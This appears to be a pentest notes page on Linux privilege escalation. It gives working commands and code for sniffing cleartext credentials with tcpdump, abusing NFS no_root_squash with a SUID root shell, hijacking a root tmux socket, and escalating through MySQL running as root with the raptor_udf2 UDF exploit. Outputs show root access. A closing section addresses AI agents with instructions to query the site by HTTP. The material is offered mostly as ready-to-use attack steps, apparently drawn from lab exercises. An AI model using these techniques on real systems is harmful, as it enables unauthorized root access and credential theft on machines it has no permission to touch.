# Miscellaneous Techniques

## Passive Traffic Capture

If `tcpdump` is installed, unprivileged users may be able to capture network traffic, including, in some cases, credentials passed in cleartext.

```
tcpdump -i 1 -w .d.pcap -s 0 'not tcp port 22' &
```

{% embed url="<https://www.instructables.com/How-to-Find-Passwords-Using-Wireshark/>" %}

### Examine data - Tools

{% embed url="<https://github.com/DanMcInerney/net-creds>" %}
net-creds
{% endembed %}

{% embed url="<https://github.com/lgandx/PCredz>" %}
PCreds
{% endembed %}

{% embed url="<https://github.com/odedshimon/BruteShark>" %}
BruteShark
{% endembed %}

{% embed url="<https://github.com/ShellCode33/CredSLayer>" %}
CredSLayer
{% endembed %}

{% embed url="<https://www.netresec.com/?page=NetworkMiner>" %}
NetMiner - Free Version
{% endembed %}

{% embed url="<https://github.com/mlgualtieri/NTLMRawUnHide>" %}

## Weak NFS Privileges

{% content-ref url="/pages/fvJdpKlMKXZDihvcp2Bs" %}
[NFS (2049, 111)](/0xss0rz/pentest/protocols/nfs-2049-111.md)
{% endcontent-ref %}

```shell-session
showmount -e 10.129.2.12
```

When an NFS volume is created, various options can be set:

| Option           | Description                                                                                                                                                                                                                                                                                   |
| ---------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `root_squash`    | If the root user is used to access NFS shares, it will be changed to the `nfsnobody` user, which is an unprivileged account. Any files created and uploaded by the root user will be owned by the `nfsnobody` user, which prevents an attacker from uploading binaries with the SUID bit set. |
| `no_root_squash` | Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow for the creation of malicious scripts/programs with the SUID bit set.                                                                           |

```shell-session
$ cat /etc/exports

# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash)
```

&#x20;Create a SETUID binary that executes `/bin/sh` using our local root user. We can then mount the `/tmp` directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit

```shell-session
htb@NIX02:~$ cat shell.c 

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}
```

```shell-session
gcc shell.c -o shell
```

```shell-session
root@Pwnbox:~$ sudo mount -t nfs 10.129.2.12:/tmp /mnt
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell
```

```shell-session
htb@NIX02:/tmp$ ./shell
root@NIX02:/tmp# id

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(htb)
```

### References

{% embed url="<https://book.hacktricks.xyz/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe>" %}

{% embed url="<https://juggernaut-sec.com/nfs-no_root_squash/>" %}

### Example

<figure><img src="/files/yUiG0WXPPkpvDtCSDkxQ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lg7koih4XecINuM5WBBp" alt=""><figcaption></figcaption></figure>

```
osboxes@osboxes:~/Desktop$ sudo mount -t nfs 10.129.197.187:/tmp /mnt
osboxes@osboxes:~/Desktop$ cd /tmp
```

<pre><code>htb-student@NIX02:~$ cd /tmp
<strong>htb-student@NIX02:/tmp$ cp /bin/bash .
</strong></code></pre>

<figure><img src="/files/TJWkPCUfKoYXifloMHOC" alt=""><figcaption></figcaption></figure>

```
osboxes@osboxes:/mnt$ sudo chown root:root bash 
osboxes@osboxes:/mnt$ sudo chmod +s bash
```

<figure><img src="/files/7bIIpVFKh086RtZ93EFx" alt=""><figcaption></figcaption></figure>

```
htb-student@NIX02:/tmp$ ./bash -p
```

<figure><img src="/files/jSiGJVCOW9lo10jTQr0i" alt=""><figcaption></figcaption></figure>

## Hijacking Tmux Sessions

```shell-session
$  ps aux | grep tmux

root      4806  0.0  0.1  29416  3204 ?        Ss   06:27   0:00 tmux -S /shareds new -s debugsess
```

```shell-session
$ ls -la /shareds 

srw-rw---- 1 root devs 0 Sep  1 06:27 /shareds
```

```shell-session
$ id

uid=1000(htb) gid=1000(htb) groups=1000(htb),1011(devs)
```

```shell-session
$ tmux -S /shareds

id

uid=0(root) gid=0(root) groups=0(root)
```

## MySQL running as root

```
ps -ef | grep mysql
```

<figure><img src="/files/Q0ZKH4veKFXjMjhqJgRg" alt=""><figcaption></figcaption></figure>

The MySQL service is running as root

```
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 
 # 1 - id
 
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 
 # 2- /bin/bash
 
 * mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
 * mysql> exit
 * /tmp/rootbash -p
```

{% embed url="<https://www.exploit-db.com/exploits/1518>" %}

{% embed url="<https://juggernaut-sec.com/mysql-user-defined-functions/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/miscellaneous-techniques.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.